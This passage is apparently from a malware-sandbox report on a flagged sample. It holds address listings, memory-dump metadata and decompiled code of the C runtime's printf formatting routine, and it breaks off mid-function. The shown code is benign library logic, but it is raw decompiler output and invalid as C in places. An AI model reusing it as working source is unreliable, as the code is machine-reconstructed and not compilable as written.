    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959ac
    0x00b959af
    0x00b959b2
    0x00b959b5
    0x00b959b8
    0x00b959bb
    0x00b959c1
    0x00b959c1
    0x00b959c1
    0x00b959c9
    0x00b959cd
    0x00000000
    0x00000000
    0x00b959cf
    0x00b959cf
    0x00b959d2
    0x00b959d5
    0x00b959d5
    0x00b959da
    0x00b959dd
    0x00b959e0
    0x00b959e3
    0x00b959e6
    0x00b959e9
    0x00b959ec
    0x00b959ec
    0x00b959ef
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b951d7
    0x00b951dd
    0x00b951dd
    0x00b951e4
    0x00000000
    0x00b9553e
    0x00b9553e
    0x00b95545
    0x00b9554c
    0x00b9554c
    0x00b9554f
    0x00000000
    0x00000000
    0x00b951eb
    0x00b951ee
    0x00b951ee
    0x00b951f4
    0x00b951f6
    0x00b951f9
    0x00b951f9
    0x00b951fe
    0x00b951fe
    0x00000000
    0x00000000
    0x00b9532b
    0x00b9532e
    0x00b9532e
    0x00b95333
    0x00b95335
    0x00b95338
    0x00b95338
    0x00b9533e
    0x00b9533e
    0x00000000
    0x00000000
    0x00b9570b
    0x00b9570b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b95555
    0x00b95558
    0x00b9555b
    0x00b9555e
    0x00b95564
    0x00b95567
    0x00b9556e
    0x00b95572
    0x00b9557d
    0x00b9557d
    0x00b95581
    0x00b95598
    0x00b95598
    0x00b9559f
    0x00b955a1
    0x00b955a1
    0x00b955a8
    0x00b955a8
    0x00b955af
    0x00b955c0
    0x00b955cf
    0x00b955d2
    0x00b955d6
    0x00b955ec
    0x00b955d8
    0x00b955d8
    0x00b955db
    0x00b955e1
    0x00b955e7
    0x00b955e7
    0x00b955d6
    0x00b955f6
    0x00b955f9
    0x00b955fc
    0x00b955ff
    0x00b95602
    0x00b95605
    0x00b9560b
    0x00b95611
    0x00b95619
    0x00b9561a
    0x00b9561d
    0x00b9561e
    0x00b95621
    0x00b95622
    0x00b95629
    0x00b9562a
    0x00b9562d
    0x00b9562e
    0x00b95631
    0x00b95632
    0x00b95638
    0x00b95639
    0x00b95647
    0x00b95649
    0x00b9564f
    0x00b9564f
    0x00b95655
    0x00b95657
    0x00b9565b
    0x00b9565d
    0x00b95665
    0x00b95666
    0x00b95669
    0x00b9566a
    0x00b95678
    0x00b9567a
    0x00b9567a
    0x00b9565b
    0x00b9567d
    0x00b95684
    0x00b95687
    0x00b9568c
    0x00b9568c
    0x00b95692
    0x00b95694
    0x00b9569c
    0x00b9569d
    0x00b956a0
    0x00b956a1
    0x00b956b0
    0x00b956b2
    0x00b956b2
    0x00b95692
    0x00b956b5
    0x00b956b8
    0x00b956bb
    0x00b956be
    0x00b956c3
    0x00b956c9
    0x00b956cc
    0x00b956cf
    0x00b956cf
    0x00b956d2
    0x00b956d2
    0x00b956d5
    0x00b956e1
    0x00000000
    0x00b956e1
    0x00b95583
    0x00b95583
    0x00b9558a
    0x00b9558d
    0x00000000
    0x00000000
    0x00b9558f
    0x00b9558f
    0x00000000
    0x00b9558f
    0x00b95574
    0x00b95574
    0x00000000
    0x00000000
    0x00b95201
    0x00b95204
    0x00b95204
    0x00b9520a
    0x00b95265
    0x00b9526d
    0x00b95274
    0x00b9527a
    0x00b95280
    0x00b9520c
    0x00b9520c
    0x00b95216
    0x00b9521a
    0x00b95222
    0x00b95229
    0x00b95236
    0x00b9523d
    0x00b95249
    0x00b9524f
    0x00b95256
    0x00b95258
    0x00b95258
    0x00b9525f
    0x00b95287
    0x00b9528d
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00000000
    0x00b956e9
    0x00b956ec
    0x00b956ef
    0x00b956f2
    0x00000000
    0x00000000
    0x00b95447
    0x00b95447
    0x00b95453
    0x00b95459
    0x00b9545e
    0x00b95460
    0x00b9550a
    0x00b9550d
    0x00b9550d
    0x00b95510
    0x00b95524
    0x00b9552a
    0x00b95530
    0x00b95512
    0x00b95512
    0x00b9551f
    0x00b9551f
    0x00b95532
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b95466
    0x00b95466
    0x00b95466
    0x00b95468
    0x00b95476
    0x00b9546a
    0x00b9546a
    0x00b9546a
    0x00b95480
    0x00b95486
    0x00b9548c
    0x00b95493
    0x00b95495
    0x00b9549a
    0x00b9549c
    0x00b954a1
    0x00b954a6
    0x00b954a8
    0x00b954ad
    0x00b954b0
    0x00b954b3
    0x00b954b5
    0x00b954b5
    0x00b954b3
    0x00b954b6
    0x00b954bd
    0x00b95505
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b954bf
    0x00b954bf
    0x00b954c4
    0x00b954e0
    0x00b954e8
    0x00b954f2
    0x00b954f5
    0x00b954fa
    0x00000000
    0x00b954fa
    0x00000000
    0x00b9574c
    0x00b9574c
    0x00b95756
    0x00b95756
    0x00b9575c
    0x00b9575e
    0x00b95761
    0x00b95761
    0x00b95767
    0x00b95767
    0x00000000
    0x00000000
    0x00b95704
    0x00b95704
    0x00000000
    0x00000000
    0x00b95341
    0x00b95341
    0x00b95345
    0x00b95353
    0x00b95356
    0x00b95347
    0x00b95347
    0x00b95347
    0x00b9535c
    0x00b95362
    0x00b95368
    0x00b95374
    0x00b9537a
    0x00b9537a
    0x00b95380
    0x00b953e7
    0x00b953e7
    0x00b953eb
    0x00b953ed
    0x00b953f3
    0x00b953f3
    0x00b953f6
    0x00b953f9
    0x00b953ff
    0x00b953ff
    0x00b953ff
    0x00b9540b
    0x00b9540e
    0x00b95414
    0x00b95416
    0x00000000
    0x00000000
    0x00b95418
    0x00b95418
    0x00b9541e
    0x00b95421
    0x00b95423
    0x00000000
    0x00000000
    0x00b95425
    0x00b9542b
    0x00b9542e
    0x00b9542e
    0x00b95436
    0x00b95436
    0x00b9543c
    0x00b9543c
    0x00b9543f
    0x00000000
    0x00b95382
    0x00b95382
    0x00b95382
    0x00b95386
    0x00b95388
    0x00b9538d
    0x00b9538d
    0x00b95390
    0x00b95397
    0x00b9539a
    0x00b953a0
    0x00b953a0
    0x00b953a0
    0x00b953ac
    0x00b953af
    0x00b953b5
    0x00b953b7
    0x00000000
    0x00000000
    0x00b953b9
    0x00b953b9
    0x00b953bf
    0x00b953c2
    0x00b953c4
    0x00000000
    0x00000000
    0x00b953c6
    0x00b953cc
    0x00b953cf
    0x00b953cf
    0x00b953d7
    0x00b953dd
    0x00b953e0
    0x00b953e2
    0x00b95442
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00000000
    0x00b956fb
    0x00b956fb
    0x00000000
    0x00000000
    0x00b95717
    0x00b95717
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00b95888
    0x00b95888
    0x00b9588e
    0x00b95894
    0x00b9589a
    0x00000000
    0x00b95848
    0x00b95848
    0x00b95848
    0x00b9584f
    0x00000000
    0x00000000
    0x00b95851
    0x00b95851
    0x00b9585c
    0x00b95862
    0x00b95864
    0x00b9586a
    0x00b9586d
    0x00b9586f
    0x00b95875
    0x00b9587e
    0x00b95883
    0x00b958a0
    0x00b958a3
    0x00b958a3
    0x00b958a8
    0x00b958ad
    0x00b958ad
    0x00b958b3
    0x00b958b5
    0x00b958bb
    0x00b958c1
    0x00b958c1
    0x00b958ca
    0x00b958ca
    0x00b958b3
    0x00b958d0
    0x00b958d4
    0x00b958e2
    0x00b958e5
    0x00b958e8
    0x00b958ef
    0x00b958f1
    0x00b958f1
    0x00b958d6
    0x00b958d6
    0x00b958d6
    0x00b958fe
    0x00b958fe
    0x00b95904
    0x00b95906
    0x00b95906
    0x00b9590d
    0x00b95910
    0x00b95913
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00b95923
    0x00b95929
    0x00b95929
    0x00b9592f
    0x00000000
    0x00000000
    0x00b95931
    0x00b95931
    0x00b95934
    0x00b95937
    0x00b9593e
    0x00b95945
    0x00b9594d
    0x00b95953
    0x00b95956
    0x00b95959
    0x00b95960
    0x00b9596c
    0x00b95972
    0x00b95978
    0x00b9597f
    0x00b95981
    0x00b95987
    0x00b95987
    0x00b9598d
    0x00b9598d
    0x00b95993
    0x00b95996
    0x00b9599c
    0x00b959a1
    0x00b959a4
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00000000
    0x00b95921
    0x00b95913
    0x00b95853
    0x00b95853
    0x00b9585a
    0x00000000
    0x00000000
    0x00000000
    0x00b9585a
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00000000
    0x00b94fb1
    0x00b94fb4
    0x00b94fb7
    0x00000000
    0x00000000
    0x00b94fbc
    0x00b94fbf
    0x00b94fc4
    0x00000000
    0x00000000
    0x00b94fa6
    0x00b94fa6
    0x00b94fa9
    0x00b94fac
    0x00000000
    0x00000000
    0x00b94f9b
    0x00b94f9e
    0x00b94fa1
    0x00000000
    0x00000000
    0x00b94fc9
    0x00b94fc9
    0x00b94fcc
    0x00b94fcc
    0x00b94fcf
    0x00000000
    0x00000000
    0x00b94fd2
    0x00000000
    0x00000000
    0x00b94d6e
    0x00b94d70
    0x00b94d7e
    0x00b94d72
    0x00b94d72
    0x00b94d72
    0x00b94d88
    0x00b94d8e
    0x00b94d9b
    0x00b94d9d
    0x00b94da2
    0x00b94da4
    0x00b94da9
    0x00b94dae
    0x00b94db0
    0x00b94db5
    0x00b94dbb
    0x00b94dbd
    0x00b94dbd
    0x00b94dbb
    0x00b94dbe
    0x00b94dc5
    0x00000000
    0x00b94dc7
    0x00b94dcc
    0x00b94de8
    0x00b94df0
    0x00b94dfd
    0x00b94e02
    0x00b95cc1
    0x00b95cce
    0x00b95cce
    0x00b94dc5
    0x00b94d68
    0x00b95bfd
    0x00b95c04
    0x00b95c1b
    0x00b95c1b
    0x00b95c25
    0x00b95c25
    0x00b95c2b
    0x00b95c38
    0x00b95c3a
    0x00b95c3f
    0x00b95c41
    0x00b95c46
    0x00b95c4b
    0x00b95c4d
    0x00b95c52
    0x00b95c58
    0x00b95c5a
    0x00b95c5a
    0x00b95c58
    0x00b95c62
    0x00b95cad
    0x00b95cb6
    0x00b95cbb
    0x00b95c64
    0x00b95c69
    0x00b95c85
    0x00b95c8d
    0x00b95c9a
    0x00b95c9f
    0x00b95c9f
    0x00000000
    0x00b95c62
    0x00b95c06
    0x00b95c0d
    0x00000000
    0x00000000
    0x00b95c0f
    0x00b95c0f
    0x00000000
    0x00b95c0f
    0x00b959f2
    0x00b952bc
    0x00b952bc
    0x00b952c2
    0x00b952c9
    0x00b952ce
    0x00b952d1
    0x00000000
    0x00b952d1

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
    • API String ID: 2232461714-3257747220
    • Opcode ID: c3e401840fee3b5909259faadae9ec74e7cb89676e21357190a354366dda434f
    • Instruction ID: 74ae397e228501b8b53ce14fa32d1efce69fa985d2eda0078b1e0a1315d81557
    • Opcode Fuzzy Hash: c3e401840fee3b5909259faadae9ec74e7cb89676e21357190a354366dda434f
    • Instruction Fuzzy Hash: 36A144B09456288BDF65DF58CC89BEDB7F1EB48304F2481E9E4196A291EB749E80CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00B965E4(void* __eflags) {
    				intOrPtr _t482;
    				signed int _t484;
    				signed int _t487;
    				void* _t492;
    				signed int _t494;
    				void* _t502;
    				void* _t520;
    				signed int _t524;
    				void* _t534;
    				signed int _t567;
    				signed int _t573;
    				void* _t594;
    				void* _t595;
    				signed int _t596;
    				void* _t598;
    				void* _t599;
    
    				L0:
    				while(1) {
    					L0:
    					_t482 = E00B93D50(_t596 + 0x14);
    					_t599 = _t598 + 4;
    					 *((intOrPtr*)(_t596 - 0x474)) = _t482;
    					if( *((intOrPtr*)(_t596 - 0x474)) == 0) {
    						goto L76;
    					}
    					L75:
    					__ecx =  *(__ebp - 0x474);
    					if( *(__ecx + 4) != 0) {
    						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    						if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    							 *(__ebp - 0xc) = 0;
    							__edx =  *(__ebp - 0x474);
    							__eax =  *(__edx + 4);
    							 *(__ebp - 4) =  *(__edx + 4);
    							__ecx =  *(__ebp - 0x474);
    							__edx =  *__ecx;
    							 *(__ebp - 0x24) =  *__ecx;
    						} else {
    							__edx =  *(__ebp - 0x474);
    							__eax =  *(__edx + 4);
    							 *(__ebp - 4) =  *(__edx + 4);
    							__ecx =  *(__ebp - 0x474);
    							__eax =  *__ecx;
    							asm("cdq");
    							 *__ecx - __edx =  *__ecx - __edx >> 1;
    							 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    							 *(__ebp - 0xc) = 1;
    						}
    						L80:
    						while(1) {
    							L187:
    							if( *(_t596 - 0x28) != 0) {
    								goto L212;
    							}
    							L188:
    							if(( *(_t596 - 0x10) & 0x00000040) != 0) {
    								if(( *(_t596 - 0x10) & 0x00000100) == 0) {
    									if(( *(_t596 - 0x10) & 0x00000001) == 0) {
    										if(( *(_t596 - 0x10) & 0x00000002) != 0) {
    											 *((short*)(_t596 - 0x14)) = 0x20;
    											 *(_t596 - 0x1c) = 1;
    										}
    									} else {
    										 *((short*)(_t596 - 0x14)) = 0x2b;
    										 *(_t596 - 0x1c) = 1;
    									}
    								} else {
    									 *((short*)(_t596 - 0x14)) = 0x2d;
    									 *(_t596 - 0x1c) = 1;
    								}
    							}
    							 *((intOrPtr*)(_t596 - 0x4ac)) =  *((intOrPtr*)(_t596 - 0x18)) -  *(_t596 - 0x24) -  *(_t596 - 0x1c);
    							if(( *(_t596 - 0x10) & 0x0000000c) == 0) {
    								E00B971B0(0x20,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    								_t599 = _t599 + 0x10;
    							}
    							E00B971F0( *(_t596 - 0x1c), _t596 - 0x14,  *(_t596 - 0x1c),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    							_t599 = _t599 + 0x10;
    							if(( *(_t596 - 0x10) & 0x00000008) != 0) {
    								if(( *(_t596 - 0x10) & 0x00000004) == 0) {
    									E00B971B0(0x30,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    									_t599 = _t599 + 0x10;
    								}
    							}
    							if( *(_t596 - 0xc) != 0) {
    								L208:
    								E00B971F0( *(_t596 - 0x24),  *(_t596 - 4),  *(_t596 - 0x24),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    								_t599 = _t599 + 0x10;
    								goto L209;
    							} else {
    								L201:
    								if( *(_t596 - 0x24) <= 0) {
    									goto L208;
    								}
    								L202:
    								 *(_t596 - 0x4b0) =  *(_t596 - 4);
    								 *(_t596 - 0x4b4) =  *(_t596 - 0x24);
    								while(1) {
    									L203:
    									 *(_t596 - 0x4b4) =  *(_t596 - 0x4b4) - 1;
    									if( *(_t596 - 0x4b4) <= 0) {
    										break;
    									}
    									L204:
    									_t520 = E00B7C680(_t596 - 0x40);
    									_t524 = E00B90E50(_t596 - 0x458,  *(_t596 - 0x4b0),  *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t596 - 0x40))) + 0xac)), _t520);
    									_t599 = _t599 + 0x10;
    									 *(_t596 - 0x4b8) = _t524;
    									if( *(_t596 - 0x4b8) > 0) {
    										L206:
    										E00B97150( *(_t596 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    										_t599 = _t599 + 0xc;
    										 *(_t596 - 0x4b0) =  *(_t596 - 0x4b0) +  *(_t596 - 0x4b8);
    										continue;
    									}
    									L205:
    									 *(_t596 - 0x44c) = 0xffffffff;
    									break;
    								}
    								L207:
    								L209:
    								if( *(_t596 - 0x44c) >= 0) {
    									if(( *(_t596 - 0x10) & 0x00000004) != 0) {
    										E00B971B0(0x20,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    										_t599 = _t599 + 0x10;
    									}
    								}
    							}
    							L212:
    							if( *(_t596 - 0x20) != 0) {
    								L00B7EB20( *(_t596 - 0x20), 2);
    								_t599 = _t599 + 8;
    								 *(_t596 - 0x20) = 0;
    							}
    							while(1) {
    								L214:
    								 *(_t596 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc))));
    								_t535 =  *(_t596 - 0x454) & 0x0000ffff;
    								 *((intOrPtr*)(_t596 + 0xc)) =  *((intOrPtr*)(_t596 + 0xc)) + 2;
    								if(( *(_t596 - 0x454) & 0x0000ffff) == 0 ||  *(_t596 - 0x44c) < 0) {
    									break;
    								} else {
    									if(( *(_t596 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t596 - 0x454) & 0x0000ffff) > 0x78) {
    										 *(_t596 - 0x4d8) = 0;
    									} else {
    										 *(_t596 - 0x4d8) =  *(( *(_t596 - 0x454) & 0x0000ffff) +  &M00B77B58) & 0xf;
    									}
    								}
    								L7:
    								 *(_t596 - 0x450) =  *(_t596 - 0x4d8);
    								_t573 =  *(_t596 - 0x450) * 9;
    								_t494 =  *(_t596 - 0x45c);
    								_t543 = ( *(_t573 + _t494 + 0xb77b78) & 0x000000ff) >> 4;
    								 *(_t596 - 0x45c) = ( *(_t573 + _t494 + 0xb77b78) & 0x000000ff) >> 4;
    								if( *(_t596 - 0x45c) != 8) {
    									L16:
    									 *(_t596 - 0x4e0) =  *(_t596 - 0x45c);
    									if( *(_t596 - 0x4e0) > 7) {
    										continue;
    									}
    									L17:
    									switch( *((intOrPtr*)( *(_t596 - 0x4e0) * 4 +  &M00B97044))) {
    										case 0:
    											L18:
    											 *(_t596 - 0xc) = 1;
    											E00B97150( *(_t596 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
    											_t599 = _t599 + 0xc;
    											goto L214;
    										case 1:
    											L19:
    											 *(__ebp - 0x2c) = 0;
    											__ecx =  *(__ebp - 0x2c);
    											 *(__ebp - 0x28) = __ecx;
    											__edx =  *(__ebp - 0x28);
    											 *(__ebp - 0x18) =  *(__ebp - 0x28);
    											__eax =  *(__ebp - 0x18);
    											 *(__ebp - 0x1c) =  *(__ebp - 0x18);
    											 *(__ebp - 0x10) = 0;
    											 *(__ebp - 0x30) = 0xffffffff;
    											 *(__ebp - 0xc) = 0;
    											goto L214;
    										case 2:
    											L20:
    											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    											 *(__ebp - 0x4e4) = __ecx;
    											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    											__eflags =  *(__ebp - 0x4e4) - 0x10;
    											if( *(__ebp - 0x4e4) > 0x10) {
    												goto L27;
    											}
    											L21:
    											_t59 =  *(__ebp - 0x4e4) + 0xb9707c; // 0x498d04
    											__ecx =  *_t59 & 0x000000ff;
    											switch( *((intOrPtr*)(__ecx * 4 +  &M00B97064))) {
    												case 0:
    													goto L24;
    												case 1:
    													goto L25;
    												case 2:
    													goto L23;
    												case 3:
    													goto L22;
    												case 4:
    													goto L26;
    												case 5:
    													goto L27;
    											}
    										case 3:
    											L28:
    											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    												__edx =  *(__ebp - 0x18);
    												__edx =  *(__ebp - 0x18) * 0xa;
    												__eflags = __edx;
    												_t83 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    												__ecx = __edx + _t83;
    												 *(__ebp - 0x18) = __ecx;
    											} else {
    												__edx = __ebp + 0x14;
    												 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x18);
    												if( *(__ebp - 0x18) < 0) {
    													__eax =  *(__ebp - 0x10);
    													__eax =  *(__ebp - 0x10) | 0x00000004;
    													__eflags = __eax;
    													 *(__ebp - 0x10) = __eax;
    													__ecx =  *(__ebp - 0x18);
    													__ecx =  ~( *(__ebp - 0x18));
    													 *(__ebp - 0x18) = __ecx;
    												}
    											}
    											L33:
    											goto L214;
    										case 4:
    											L34:
    											 *(__ebp - 0x30) = 0;
    											goto L214;
    										case 5:
    											L35:
    											__edx =  *(__ebp - 0x454) & 0x0000ffff;
    											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
    											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    												__ecx =  *(__ebp - 0x30);
    												__ecx =  *(__ebp - 0x30) * 0xa;
    												__eflags = __ecx;
    												_t94 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    												__eax = __ecx + _t94;
    												 *(__ebp - 0x30) = __ecx + _t94;
    											} else {
    												__eax = __ebp + 0x14;
    												 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x30);
    												if( *(__ebp - 0x30) < 0) {
    													 *(__ebp - 0x30) = 0xffffffff;
    												}
    											}
    											goto L214;
    										case 6:
    											L41:
    											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    											 *(__ebp - 0x4e8) = __ecx;
    											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    											__eflags =  *(__ebp - 0x4e8) - 0x2e;
    											if( *(__ebp - 0x4e8) > 0x2e) {
    												L64:
    												goto L214;
    											}
    											L42:
    											_t102 =  *(__ebp - 0x4e8) + 0xb970a4; // 0x68b19003
    											__ecx =  *_t102 & 0x000000ff;
    											switch( *((intOrPtr*)(__ecx * 4 +  &M00B97090))) {
    												case 0:
    													L47:
    													__ecx =  *(__ebp + 0xc);
    													__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
    													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
    														L50:
    														__ecx =  *(__ebp + 0xc);
    														__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    														__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
    														if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
    															L53:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx & 0x0000ffff;
    															__eflags = ( *__ecx & 0x0000ffff) - 0x64;
    															if(( *__ecx & 0x0000ffff) == 0x64) {
    																L59:
    																L61:
    																goto L64;
    															}
    															L54:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = __ecx - 0x69;
    															if(__ecx == 0x69) {
    																goto L59;
    															}
    															L55:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
    															if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
    																goto L59;
    															}
    															L56:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx & 0x0000ffff;
    															__eflags = ( *__ecx & 0x0000ffff) - 0x75;
    															if(( *__ecx & 0x0000ffff) == 0x75) {
    																goto L59;
    															}
    															L57:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = __ecx - 0x78;
    															if(__ecx == 0x78) {
    																goto L59;
    															}
    															L58:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
    															if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
    																 *(__ebp - 0x45c) = 0;
    																goto L18;
    															}
    															goto L59;
    														}
    														L51:
    														__eax =  *(__ebp + 0xc);
    														__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    														__eflags = __ecx - 0x32;
    														if(__ecx != 0x32) {
    															goto L53;
    														} else {
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    															goto L61;
    														}
    													}
    													L48:
    													__eax =  *(__ebp + 0xc);
    													__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    													__eflags = __ecx - 0x34;
    													if(__ecx != 0x34) {
    														goto L50;
    													} else {
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    														goto L61;
    													}
    												case 1:
    													L62:
    													__ecx =  *(__ebp - 0x10);
    													__ecx =  *(__ebp - 0x10) | 0x00000020;
    													 *(__ebp - 0x10) = __ecx;
    													goto L64;
    												case 2:
    													L43:
    													__edx =  *(__ebp + 0xc);
    													__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
    													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
    														__eax =  *(__ebp - 0x10);
    														__eax =  *(__ebp - 0x10) | 0x00000010;
    														__eflags = __eax;
    														 *(__ebp - 0x10) = __eax;
    													} else {
    														__ecx =  *(__ebp + 0xc);
    														__ecx =  *(__ebp + 0xc) + 2;
    														 *(__ebp + 0xc) = __ecx;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    													}
    													goto L64;
    												case 3:
    													L63:
    													__edx =  *(__ebp - 0x10);
    													__edx =  *(__ebp - 0x10) | 0x00000800;
    													__eflags = __edx;
    													 *(__ebp - 0x10) = __edx;
    													goto L64;
    												case 4:
    													goto L64;
    											}
    										case 7:
    											L65:
    											__eax =  *(__ebp - 0x454) & 0x0000ffff;
    											 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
    											__ecx =  *(__ebp - 0x4ec);
    											__ecx =  *(__ebp - 0x4ec) - 0x41;
    											 *(__ebp - 0x4ec) = __ecx;
    											__eflags =  *(__ebp - 0x4ec) - 0x37;
    											if( *(__ebp - 0x4ec) > 0x37) {
    												goto L187;
    												do {
    													do {
    														while(1) {
    															L187:
    															if( *(_t596 - 0x28) != 0) {
    																goto L212;
    															}
    															goto L188;
    														}
    														L183:
    														__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
    														 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
    														__ecx =  *(__ebp - 4);
    														__ecx =  *(__ebp - 4) + 1;
    														 *(__ebp - 4) = __ecx;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    														__eflags =  *(__ebp - 0x10) & 0x00000200;
